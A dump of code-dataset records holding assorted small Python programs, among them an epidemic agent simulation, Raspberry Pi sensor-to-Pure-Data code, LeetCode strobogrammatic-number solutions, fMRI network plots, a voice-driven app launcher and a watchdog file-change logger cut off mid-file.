False\n\t\treturn True\n\n\tdef set_infected(self, current_day):\n\t\tself.is_infected = True\n\t\tself.has_been_infected = True\n\t\tself.day_infected = current_day\n\n\tdef update_status(self, current_day):\n\t\tif not self.is_alive:\n\t\t\treturn\n\n\t\tif self.is_infected:\n\t\t\tif self.dies():\n\t\t\t\tself.is_alive = False\n\t\t\t\tself.is_infected = False\n\t\t\t\tself.has_symptoms = False\n\t\t\t\tself.is_isolated = True\n\t\t\t\treturn\n\n\t\t\tif self.day_infected + self.days_until_symptoms == current_day:\n\t\t\t\tself.has_symptoms = True\n\t\t\t\tself.is_isolated = True\n\n\t\t\tif self.day_infected + self.total_days_sick == current_day:\n\t\t\t\tself.is_infected = False\n\t\t\t\tself.is_isolated = False\n\t\t\t\tself.has_symptoms = False\n\n\t\tif not self.is_infected and self.is_isolated:\n\t\t\tif self.day_isolated + self.total_days_sick == current_day:\n\t\t\t\tself.is_isolated = False\n\n\tdef update_location(self, current_time):\n\t\tpass\n\n\tdef dies(self):\n\t\treturn rn.random() < self.mortality_rate\n\n\tdef set_in_isolation(self, current_day):\n\t\tif not self.is_isolated:\n\t\t\tself.is_isolated = True\n\t\t\tself.day_isolated = current_day\n","sub_path":"simulator/simulator_local/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"558980788","text":"def solution(data):\n sum0 , sum1 = 0 , 0\n for i in range(len(data)//2):\n sum0 += i\n for i in range(len(data)//2 , len(data)):\n sum1 += i\n if (sum0 == sum1):\n return 'LUCKY'\n else:\n return 'READY'\n\ndata = [123402]\nprint(solution(data))","sub_path":"08_test/02implement/t07.py","file_name":"t07.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"189403372","text":"import json\n\nfoo = dict(\n average_name_length = 1,\n pct_with_timezone = 1,\n avg_number_of_hashtags = 1,\n avg_retweets = 1,\n pct_with_location = 1,\n most_popular_language = 1\n )\n\nbar = json.dumps(foo)\n\nprint(bar)\n","sub_path":"report-project/scratch/agg.py","file_name":"agg.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"186022184","text":"#!/usr/bin/python\n\nimport os # import os for sending messages to PD\nimport spidev # import the spidev module\nimport time # import time for the sleep function\nimport RPi.GPIO as GPIO\n\n# Open SPI bus\nspi = spidev.SpiDev()\nspi.open(0,0)\nspi.max_speed_hz=1000000\n\nwaitTime = .04\nbounceTime = 0.1\n\nbtn1alreadyPressed = False\nbtn2alreadyPressed = False\nbtn3alreadyPressed = False\nbtn4alreadyPressed = False\n\nGPIO.setmode(GPIO.BCM)\n## GPIO.setup(4, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(4, GPIO.IN)\nGPIO.setup(17, GPIO.IN)\nGPIO.setup(18, GPIO.IN)\nGPIO.setup(27, GPIO.IN)\n \ndef send2Pd(message=''):\n # Send a message to Pd\n os.system(\"echo '\" + message + \"' | pdsend 3000 localhost udp\")\n\ndef readadc(channel):\n if channel > 7 or channel < 0:\n return -1 \n\n # spi.xfer2 sends three bytes and returns three bytes:\n # byte 1: the start bit (always 0x01)\n # byte 2: configure bits, see MCP3008 datasheet table 5-2\n # byte 3: don't care\n r = spi.xfer2([1, 8 + channel << 4, 0])\n\n # Three bytes are returned; the data (0-1023) is in the\n # lower 3 bits of byte 2, and byte 3 (datasheet figure 6-1)\n v = ((r[1] & 3) << 8) + r[2]\n\n return v;\n\nwhile True:\n btn1pressed = not GPIO.input(4)\n btn2pressed = not GPIO.input(17)\n btn3pressed = not GPIO.input(18)\n btn4pressed = not GPIO.input(27)\n\n if btn1pressed and not btn1alreadyPressed:\n# print('1 Pressed')\n message = '8 1'\n send2Pd(message)\n btn1alreadyPressed = btn1pressed\n\n if btn2pressed and not btn2alreadyPressed:\n# print('2 Pressed')\n message = '8 2'\n send2Pd(message)\n btn2alreadyPressed = btn2pressed\n\n if btn3pressed and not btn3alreadyPressed:\n# print('3 Pressed')\n message = '8 3'\n send2Pd(message)\n btn3alreadyPressed = btn3pressed\n\n if btn4pressed and not btn4alreadyPressed:\n# print('4 Pressed')\n message = '8 4'\n send2Pd(message)\n btn4alreadyPressed = btn4pressed\n\n values = [0]*8\n \n for i in range(8):\n values[i] = readadc(i)\n message = str(i) + ' ' + str(values[i]) # make a string for use with Pdsend\n send2Pd(message)\n\n# consider creating a message that has all values in one string rather than separate messages\n print('| {0:>4} | {1:>4} | {2:>4} | {3:>4} | {4:>4} | {5:>4} | {6:>4} | {7:>4} |'.format(*values))\n# print(message)\n time.sleep(waitTime)\n","sub_path":"python-scripts/lop2pd.py","file_name":"lop2pd.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"108101415","text":"class university:\n \n def _init_(self):\n self.marks=-1\n self.age=0\n self.stud_id=\"\"\n \n def validate_marks(self):\n if self.marks>=0 and self.marks<=100:\n return True\n else:\n return False\n \n def validate_age(self):\n if (self.age>=21):\n return True\n else:\n return False\n \n def check_qualification(self):\n if (self.validate_age() is True and self.validate_marks() is True):\n if self.marks>=65:\n return True\n else:\n return False\n else:\n return False\n \n def setter(self,marks,age,stud_id):\n self.marks=marks\n self.age=age\n self.stud_id=stud_id\n \n def getter(self):\n print(\"Student ID : \",self.stud_id)\n print(\"Age : \",self.age)\n print(\"Marks : \",self.marks)\n \n\n\nsid = input(\"Enter the Student ID - \")\na = int(input(\"Enter the age of the student - \"))\nm = int(input(\"Enter the marks obtained by the student - \"))\nprint(\"\\n\\n\")\n\nstud1 = university()\nstud1.setter(m,a,sid)\nstud1.getter()\nprint(\"\\n\")\n\nif stud1.check_qualification() is True:\n print(stud1.stud_id,\" is Qualified!\")\nelse:\n print(stud1.stud_id,\" is not Qualified\")\n","sub_path":"Lab_4.py","file_name":"Lab_4.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"551447583","text":"# Copyright (C) 2015 Canonical Ltd.\n# Author: Barry Warsaw \n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; version 3 of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n__all__ = [\n \"chdir\",\n ]\n\n\nimport os\n\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef chdir(directory):\n \"\"\"With-statement for temporarily changing current working directory.\"\"\"\n old_dir = os.getcwd()\n try:\n os.chdir(directory)\n yield\n finally:\n os.chdir(old_dir)\n","sub_path":"lib/systemimage/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"54692228","text":"\"\"\"\n247. Strobogrammatic Number II\nMedium\n\nA strobogrammatic number is a number that looks the same when rotated 180 degrees (looked at upside down).\n\nFind all strobogrammatic numbers that are of length = n.\n\nExample:\n\nInput: n = 2\nOutput: [\"11\",\"69\",\"88\",\"96\"]\n\"\"\"\n\nfrom typing import List\n\n###############################################################################\n\"\"\"\nSolution: build all strobogrammatic numbers of length n iteratively.\nBuild prefixes and suffixes for each number.\n\nNote: \"00\" is not a valid length 2 strobogrammatic number. \nThe integer 0 corresponds to \"0\", which has length 1.\nIn general, the first char in a strobogrammatic number cannot be \"0\".\n\nRange of indices to process:\n\nn = 1\nindices: 0\n\nn = 2\nindices: 0 1\nrange(1)\n\nn = 3\nindices: 0 1 2\nrange(1)\n\nn = 4\nindices: 01 23\nrange(2)\n\nn = 5\nindices: 01 2 34\nrange(2)\n\n\"\"\"\nclass Solution:\n def findStrobogrammatic(self, n: int) -> List[str]:\n d = {'0': '0', '1': '1', '6': '9', '8': '8', '9': '6'}\n\n res = [('', '')] # tuples of prefix and suffix for each number\n\n for i in range(n//2):\n new_res = []\n\n for ch in d:\n if i == 0 and ch == '0': # don't use '0' as first digit\n continue\n\n for s1, s2 in res:\n new_res.append((s1 + ch, d[ch] + s2))\n \n res = new_res\n\n if n % 2 == 1:\n return [s1 + ch + s2 for s1, s2 in res for ch in ['0','1','8']]\n\n return [s1 + s2 for s1, s2 in res]\n\n\"\"\"\nSolution 1b: same idea, but written differently.\n\nUpdate \"res\" using list comprehensions, and avoid using temp list \"new_res\".\n\"\"\"\nclass Solution1b:\n def findStrobogrammatic(self, n: int) -> List[str]:\n d = {'0': '0', '1': '1', '6': '9', '8': '8', '9': '6'}\n\n res = [('', '')] # tuples of prefix and suffix for each number\n\n for i in range(n//2):\n if i == 0: # don't use '0' as first digit\n res = [(s1 + ch, d[ch] + s2) for s1, s2 in res \n for ch in ('1','6','8','9')]\n else:\n res = [(s1 + ch, d[ch] + s2) for s1, s2 in res for ch in d]\n \n if n % 2 == 1:\n return [s1 + ch + s2 for s1, s2 in res for ch in ['0','1','8']]\n\n return [s1 + s2 for s1, s2 in res]\n\n###############################################################################\n\"\"\"\nSolution 2: build iteratively, from middle of each number to both ends.\n\"\"\"\nclass Solution2:\n def findStrobogrammatic(self, n: int) -> List[str]:\n res = ['0', '1', '8'] if (n % 2 == 1) else ['']\n \n if n < 2:\n return res\n\n while len(res[0]) < n:\n new_res = []\n\n for s in res:\n if len(s) < n - 2: # don't use '0' on last iteration\n new_res.append('0' + s + '0')\n\n new_res.append('1' + s + '1')\n new_res.append('6' + s + '9')\n new_res.append('8' + s + '8')\n new_res.append('9' + s + '6')\n\n res = new_res\n\n return res\n\n\"\"\"\nSolution 2b: same as sol 1b, but with some optimizations.\n\"\"\"\nclass Solution2b:\n def findStrobogrammatic(self, n: int) -> List[str]:\n res = ['0', '1', '8'] if n & 1 else ['']\n \n if n < 2:\n return res\n\n k = len(res[0])\n \n while k < n:\n new_res = []\n k += 2 # length of new strings\n\n for s in res:\n if k < n: # don't use '0' on last iteration\n new_res.extend(['0'+s+'0', \n '1'+s+'1', '6'+s+'9', '8'+s+'8', '9'+s+'6'])\n else:\n new_res.extend(['1'+s+'1', '6'+s+'9', '8'+s+'8', '9'+s+'6'])\n\n res = new_res\n\n return res\n\n\"\"\"\nSolution 2c: same as sol 1c, but using a \"for\" loop.\n\"\"\"\nclass Solution2c:\n def findStrobogrammatic(self, n: int) -> List[str]:\n res = ['0', '1', '8'] if n & 1 else ['']\n \n if n < 2:\n return res\n\n start = len(res[0]) + 2\n\n for k in range(start, n+1, 2): # length of new strings\n new_res = []\n\n for s in res:\n if k < n: # don't use '0' on last iteration\n new_res.extend(['0'+s+'0', \n '1'+s+'1', '6'+s+'9', '8'+s+'8', '9'+s+'6'])\n else:\n new_res.extend(['1'+s+'1', '6'+s+'9', '8'+s+'8', '9'+s+'6'])\n\n res = new_res\n\n return res\n\n###############################################################################\n\"\"\"\nSolution 3: recursion\n\"\"\"\nclass Solution3:\n def findStrobogrammatic(self, n: int) -> List[str]:\n def rec(n):\n if n == 0:\n return ['']\n if n == 1:\n return ['0', '1', '8']\n\n return [ch + s + d[ch] for ch in d for s in rec(n-2)]\n \n if n == 1:\n return ['0', '1', '8']\n\n d = {'0': '0', '1': '1', '6': '9', '8': '8', '9': '6'} \n\n #return [s for s in rec(n) if s[0] != '0'] # alternative\n return [ch + s + d[ch] for ch in ['1','6','8','9'] for s in rec(n-2)]\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(n, comment=None):\n print(\"=\"*80)\n if comment:\n print(comment)\n\n print()\n print(f\"n = {n}\")\n\n res = sol.findStrobogrammatic(n)\n \n print(f\"\\nres = {res}\")\n print(f\"\\nlen = {len(res)}\\n\")\n\n\n sol = Solution() # iterative\n sol = Solution1b() \n \n sol = Solution2() # iterative, build from middle of each number\n sol = Solution2b()\n sol = Solution2c()\n\n #sol = Solution3() # recursive\n\n comment = 'LC ex; answer = [\"11\",\"69\",\"88\",\"96\"]'\n n = 2\n test(n, comment)\n\n comment = \"\"\n n = 1\n test(n, comment)\n\n comment = \"\"\n n = 3\n test(n, comment)\n\n comment = \"\"\n n = 4\n test(n, comment)\n\n comment = \"\"\n n = 5\n test(n, comment)\n","sub_path":"math/0247_strobogrammatic_number_ii.py","file_name":"0247_strobogrammatic_number_ii.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"595975629","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport community # Louvain method\n\n# ROI IDs\n# Left precentral gyrus: 50\n# Left post-cingulate, precuneus: 174\n\n##### Custom distinct color function --- to be used later\ndef get_cmap(n, name='hsv'):\n '''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct \n RGB color; the keyword argument name must be a standard mpl colormap name.'''\n return plt.cm.get_cmap(name, n)\n\n\n####### Loading the network data\nfTS = 'DatafMRIPreprop/NewYork_sub83453_Rt2_K200.npz'\nnodes = np.load(fTS)['nodes']\nxyz = np.load(fTS)['xyz']\nfG = 'DatafMRIPreprop/NewYork_sub83453_Rt2_K200_deg20.adjlist'\nfG_ms = 'DatafMRIPreprop/NewYork_sub83453_ms_Rt2_K200_deg20.adjlist'\nG = nx.read_adjlist(fG, nodetype=int)\nG_ms = nx.read_adjlist(fG_ms, nodetype=int)\nG_list = [G, G_ms]\nnetLabel = ['Without motion scrubbing',\n 'With motion scrubbing']\n\n\n####### Finding the giant component and modular partition\npartition_list = []\nGC_list = []\nfor iG in G_list:\n # finding the giant component\n GC_nodes = max(nx.connected_components(iG), key=len) \n GC = iG.subgraph(GC_nodes)\n GC_list.append(iG)\n ###### modular partition by Louvain\n partition = community.best_partition(GC)\n partition_list.append(partition)\n\n\n\n###### drawing the graph\n# dictionary of xy-coordinates\npos = {}\nfor iROI in range(len(nodes)):\n pos[nodes[iROI]] = xyz[iROI,:2]\n\n# Loop over states for visualization\nplt.figure(figsize=[6,4])\nfor i,iGC in enumerate(GC_list):\n \n # finally, graph with communities in different colors (Louvain)\n plt.subplot(1,2,i+1)\n nComm = max([comm for comm in partition_list[i].values()])+1\n node_color_list = get_cmap(nComm+1,'rainbow')\n for iComm in range(nComm):\n nodeList = [iNode for iNode,Comm in partition_list[i].items()\n if Comm==iComm]\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = np.array([node_color_list(iComm)]),\n node_size=30)\n nx.draw_networkx_edges(iGC, pos, width=0.25,\n edge_color='lightblue')\n plt.title(netLabel[i])\n plt.axis('off')\n\nplt.subplots_adjust(left=0.01, right=0.99, wspace=0.05,\n bottom=0.025, top=0.85)\nplt.show()\n\n\n\n\n###### drawing the graph (SM module)\n# Identifying SM module for each network\nROI_SM = 50 # ROI=50 --> Left precentral gyrus\nindSM_list = []\nfor iMod in partition_list:\n indSM_list.append(iMod[ROI_SM])\n \n# Loop over states for visualization\nplt.figure(figsize=[6,4])\nfor i,iGC in enumerate(GC_list):\n \n # finally, graph with communities in different colors (Louvain)\n plt.subplot(1,2,i+1)\n nComm = max([comm for comm in partition_list[i].values()])+1\n for iComm in range(nComm):\n nodeList = [iNode for iNode,Comm in partition_list[i].items()\n if Comm==iComm]\n if iComm==indSM_list[i]:\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = 'orangered',\n node_size=30)\n else:\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = 'skyblue',\n node_size=15)\n \n nx.draw_networkx_edges(iGC, pos, width=0.25,\n edge_color='lightblue')\n plt.title(netLabel[i])\n plt.axis('off')\n\nplt.suptitle('Sensory-motor module', size=16)\nplt.subplots_adjust(left=0.01, right=0.99, wspace=0.05,\n bottom=0.025, top=0.85)\nplt.show()\n\n\n\n\n\n###### drawing the graph (DMN module)\n# Identifying DMN module for each network\nROI_DMN = 174 # ROI=174 --> Left posterior cingulate / precuneus\nindDMN_list = []\nfor iMod in partition_list:\n indDMN_list.append(iMod[ROI_DMN])\n \n# Loop over states for visualization\nplt.figure(figsize=[6,4])\nfor i,iGC in enumerate(GC_list):\n \n # finally, graph with communities in different colors (Louvain)\n plt.subplot(1,2,i+1)\n nComm = max([comm for comm in partition_list[i].values()])+1\n for iComm in range(nComm):\n nodeList = [iNode for iNode,Comm in partition_list[i].items()\n if Comm==iComm]\n if iComm==indDMN_list[i]:\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = 'orangered',\n node_size=30)\n else:\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = 'skyblue',\n node_size=15)\n \n nx.draw_networkx_edges(iGC, pos, width=0.25,\n edge_color='lightblue')\n plt.title(netLabel[i])\n plt.axis('off')\n\nplt.suptitle('Default mode network module', size=16)\nplt.subplots_adjust(left=0.01, right=0.99, wspace=0.05,\n bottom=0.025, top=0.85)\nplt.show()\n","sub_path":"fMRIPreprop/ModulesMS.py","file_name":"ModulesMS.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634519267","text":"from django.conf.urls.defaults import patterns\n\nurlpatterns = patterns('amazon.views',\n (r'^$', 'index'),\n (r'^textBookList/$', 'textBookList'),\n (r'^showRanksForBook/(?P.*)$', 'showRanksForBook'),\n (r'^showRanksByDate/(?P.*)$', 'showRanksByDate'),\n (r'^showBookRankGraph/', 'showBookRankGraph'),\n (r'^showTweetsForBook', 'showTweetsForBook'),\n (r'^getTweets', 'getTweets'),\n (r'^static/(?P.*)$', 'serveStaticFile'),\n)","sub_path":"python/django-bookbuzz/amazon/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"307821312","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport math\n\ndataset = pd.read_csv(\"D:\\\\Python\\\\Machine Learning\\\\01 Linear Reg\\\\mycsv.csv\")\nsize = dataset['sizeList']\nprice = dataset['priceList']\n\nx = np.array(size).reshape(-1,1)\ny = np.array(price).reshape(-1,1)\n\nprint(x)\n\n# Fit the model. Gradient Decent make optimization problem\nmodel = LinearRegression()\nmodel.fit(x, y)\n\n#MSE and R vlaue\n\nregression_model_mse = mean_squared_error(x, y)\nprint(\"MSE : \", math.sqrt(regression_model_mse))\nprint(\"R squared value : \", model.score(x,y))\n\n# y = b0+b1x\n#b0\nprint(\"b0 : \",model.intercept_[0])\n\n#b1\nprint(\"b1 : \",model.coef_[0])\n\nplt.scatter(x, y, color='green')\nplt.plot(x, model.predict(x), color = 'black')\nplt.title(\"Linear Regression\")\nplt.xlabel(\"Land Size\")\nplt.ylabel(\"Price\")\nplt.show()\n\nprint(\"Prediction by the model: \", model.predict([[50]]))\n\n","sub_path":"Machine Learning/Udemy ML/01 Linear Reg/linearreg.py","file_name":"linearreg.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"36680881","text":"import magma as m\nfrom loam.parts.xilinx.spartan3 import XC3S250E\nfrom loam.parts.generic.crystal import Crystal\n#from loam.parts.ftdi.ft232r import FT232R\n#from loam.peripherals.timer import Timer\n\nfrom .papilio import Papilio\n\n'''\nSPECS: Xilinx XC3S250E\n----------------------------------\nLogics Cells : 5508\nCLBs : 612\nDistributed RAM bits : 38K\nBlock RAM bits : 216K\nDCMs : 4\nMax User I/O : 172\nMax Differential I/O Pairs : 68\n----------------------------------\n'''\n\n#\n# UCF file for the Papilio One board\n# Generated by pin_converter, written by Kevin Lindsey\n# https://github.com/thelonious/papilio_pins/tree/development/pin_converter\n\n# Main board wing pin [] to FPGA pin Pxx map\n# -------C------- -------B------- -------A-------\n# [GND] [C00] P91 [GND] [B00] P85 P86 [A15]\n# [2V5] [C01] P92 [2V5] [B01] P83 P84 [A14]\n# [3V3] [C02] P94 [3V3] [B02] P78 P79 [A13]\n# [5V0] [C03] P95 [5V0] [B03] P71 P70 [A12]\n# [C04] P98 [B04] P68 P67 [A11] [5V0]\n# [C05] P2 [B05] P66 P65 [A10] [3V3]\n# [C06] P3 [B06] P63 P62 [A09] [2V5]\n# [C07] P4 [B07] P61 P60 [A08] [GND]\n# [GND] [C08] P5 [GND] [B08] P58 P57 [A07]\n# [2V5] [C09] P9 [2V5] [B09] P54 P53 [A06]\n# [3V3] [C10] P10 [3V3] [B10] P41 P40 [A05]\n# [5V0] [C11] P11 [5V0] [B11] P36 P35 [A04]\n# [C12] P12 [B12] P34 P33 [A03] [5V0]\n# [C13] P15 [B13] P32 P26 [A02] [3V3]\n# [C14] P16 [B14] P25 P23 [A01] [2V5]\n# [C15] P17 [B15] P22 P18 [A00] [GND]\n#\nclass PapilioOne(Papilio):\n\n def __init__(self, fpga=XC3S250E):\n super(PapilioOne,self).__init__(\"PapilioOne\")\n\n # Need to define the interface ...\n\n self.fpga = fpga = fpga(board=self)\n\n self.A = [fpga.P18, fpga.P23, fpga.P26, fpga.P33, \n fpga.P35, fpga.P40, fpga.P53, fpga.P57,\n fpga.P60, fpga.P62, fpga.P65, fpga.P67, \n fpga.P70, fpga.P79, fpga.P84, fpga.P86]\n\n self.B = [fpga.P85, fpga.P83, fpga.P78, fpga.P71, \n fpga.P68, fpga.P66, fpga.P63, fpga.P61,\n fpga.P58, fpga.P54, fpga.P41, fpga.P36, \n fpga.P34, fpga.P32, fpga.P25, fpga.P22]\n\n self.C = [fpga.P91, fpga.P92, fpga.P94, fpga.P95, \n fpga.P98, fpga.P2, fpga.P3, fpga.P4,\n fpga.P5, fpga.P9, fpga.P10, fpga.P11,\n fpga.P12, fpga.P15, fpga.P16, fpga.P17]\n\n # Clock setup\n self.CLKIN = fpga.P89\n self.CLKIN.rename('CLKIN')\n\n #print('wiring crystal')\n self.Crystal = Crystal(32000000, board=self)\n m.wire(self.Crystal.O, self.CLKIN.I)\n\n #print('wiring clock')\n self.Clock = fpga.clock\n m.wire(self.CLKIN.O, self.Clock.I)\n\n\n # Timer peripheral setup\n #print('wiring timer')\n # self.Timer = Timer(fpga, name='systimer')\n\n\n # USART setup\n self.RX = fpga.P88\n self.RX.rename('RX').input()\n\n self.TX = fpga.P90\n self.TX.rename('TX').output()\n\n #print('wiring uart')\n #self.usart = FT232R(board=self)\n #m.wire(self.TX, self.usart.RX)\n #m.wire(self.usart.TX, self.RX)\n\n #self.usart0 = fpga.USART(fpga)\n #self.usart.peripheral(self.usart0)\n #m.wire(self.usart0.TX, self.TX)\n #m.wire(self.RX, self.usart0.RX)\n\n\n # Flash setup\n #self.CS = fpga.P24\n #self.SCLK = fpga.P50\n #self.MOSI = fpga.P27\n #self.MISO = fpga.P44\n\n #self.Flash = Flash(self)\n #self.SCLK.rename('SCLK').output()\n #self.MOSI.rename('MOSI').output()\n #self.MISO.rename('MISO').output()\n #self.CS. rename('CS') .output()\n #m.wire(self.SCLK, self.Flash.SCLK)\n #m.wire(self.MOSI, self.Flash.MOSI)\n #m.wire(self.Flash.MISO, self.MISO)\n #m.wire(self.CS, self.Flash.CS)\n\n","sub_path":"loam/boards/papilioone.py","file_name":"papilioone.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"175412921","text":"import pyttsx3\r\nimport os\r\n\r\npyttsx3.speak(\"Welcome to my Tools\")\r\n\r\npyttsx3.speak(\"Here are all the application that you run\")\r\nprint(\"********************************************************\")\r\nprint(\" Chrome \")\r\nprint(\" YouTube \")\r\nprint(\" Paint \")\r\nprint(\" AnyDesk \")\r\nprint(\" Telegram \")\r\nprint(\" WordPad \")\r\nprint(\" Notepad++ \")\r\nprint(\" Windows Media Player \")\r\nprint(\" MS Word \")\r\nprint(\" MS PowerPoint \")\r\nprint(\" MS Excel \")\r\nprint(\"********************************************************\")\r\n\r\npyttsx3.speak(\"What application you want to run\")\r\n\r\nwhile True:\r\n print(\"Application you want to run\",end= \"\")\r\n p = input()\r\n\r\n if (\"not \" in p) or (\"donot\" in p) or (\"don't\" in p):\r\n pyttsx3.speak(\"Can't open this Application. Try some thing another\")\r\n print(\"can't open \",p)\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"chrome\" in p):\r\n pyttsx3.speak(\"Opening Chrome\")\r\n os.system(\"chrome\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"youtube\" in p):\r\n pyttsx3.speak(\"Opening youtube\")\r\n os.system(\"chrome youtube.com\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"paint\" in p):\r\n pyttsx3.speak(\"Opening Paint\")\r\n os.system(\"mspaint\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"anydesk\" in p):\r\n pyttsx3.speak(\"Opening AnyDesk\")\r\n os.system(\"AnyDesk\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"telegram\" in p):\r\n pyttsx3.speak(\"Opening Telegram\")\r\n os.system(\"telegram\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"wordpad\" in p):\r\n pyttsx3.speak(\"Opening word pad\")\r\n os.system(\"wordpad\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"notepad++\" in p):\r\n pyttsx3.speak(\"Opening notepad ++\")\r\n os.system(\"notepad++\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and ((\"notepad\" in p) or (\"editor\" in p)):\r\n pyttsx3.speak(\"Opening Notepad\")\r\n os.system(\"notepad\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"player\" in p) and (\"media\" in p):\r\n pyttsx3.speak(\"Opening Windows Media Player\")\r\n os.system(\"wmplayer\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"microsoft\" in p) and (\"office\" in p) and (\"word\" in p):\r\n pyttsx3.speak(\"Opening MS Word\")\r\n os.system(\"winword\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"microsoft\" in p) and (\"office\" in p) and (\"powerpoint\" in p):\r\n pyttsx3.speak(\"Opening MS Powerpoint\")\r\n os.system(\"powerpnt\")\r\n elif ((\"run\" in p) or (\"execute\" in p)) and (\"microsoft\" in p) and (\"office\" in p) and (\"excel\" in p):\r\n pyttsx3.speak(\"Opening Excel\")\r\n os.system(\"excel\")\r\n elif (\"exit\" in p) or (\"quit\" in p):\r\n pyttsx3.speak(\"Exiting from the Software\")\r\n break\r\n else:\r\n print(\"don't support...Please install that Application\")\r\n\r\n","sub_path":"humanProj.py","file_name":"humanProj.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"531311165","text":"import re\n\n# DELキー文字(0x7F)が入ってるかどうか判別する\n\np = re.compile(r'[\\u007F]+')\n\nmoji = 'あいう' + '\\u007F' + 'dd'\nprint(moji)\nmoji2 = 'bb上お'\n\nif p.findall(moji):\n print('見つかった')\n\nif p.findall(moji2):\n print('見つかった')\nelse:\n print('見つからず')\n\n# 単純な正規表現よりこっちが早い\nif '\\u007F' in moji:\n print('inでも見つかる!!') ","sub_path":"cheat_sheet/del_key_chk_smp.py","file_name":"del_key_chk_smp.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"508681416","text":"#!/usr/bin/env python\r\n\r\nimport subprocess\r\nimport shlex\r\nfrom lib import *\r\n\r\ndef main():\r\n program_l = [\"program1\", \"program2\", \"program3\"]\r\n task_gr = tsk.TaskGroup()\r\n # Create Tasks\r\n for pname in program_l:\r\n cmd = \"python ./programs/%s.py\" % pname\r\n task_gr.AddTask(tsk.Task(cmd))\r\n # Launch Tasks\r\n task_gr.LaunchInParallel()\r\n # Wait for Tasks\r\n task_gr.WaitForAll()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"task_group.py","file_name":"task_group.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"68210152","text":"import time \nfrom watchdog.observers import Observer \nfrom watchdog.events import FileSystemEventHandler \nimport csv\nfrom datetime import datetime\nimport os\nimport psutil\n\nglobal logFile, script\n\nlogFile = 'D:/LogFile.csv'\nscript = 'D:/Latihan Python/Tkinter/Logging/script.pyw'\n\n\nclass OnMyWatch(): \n # Set the directory on watch \n # watchDirectory = input('Input short path:')\n \n def __init__(self): \n self.observer = Observer() \n\n def run(self, path): \n event_handler = Handler() \n self.path = path\n self.observer.schedule(event_handler, self.path, recursive = True) \n self.observer.start() \n try: \n while True: \n time.sleep(5) \n except: \n self.observer.stop() \n print(\"[*]Logging has stopped\\n\") \n \n self.observer.join()\n\n def showlog(self):\n count = 0\n print('\\n[*]Press CTRL + C to Stop Logging')\n print('[*]Logging has started...')\n \n with open('D:\\\\LogFile.csv') as csv_file:\n print(\"DATE\\t\\t TIME\\t\\t\\t EVENT\\t ADDRESS\")\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n count = count + 1\n print(row[0],'|',row[1],'|',row[2],'|', row[3])\n # print('\\n')\n\n if count == 0:\n print(\"\\t\\tErr!!(NoLogFiles)\\n\")\n \n 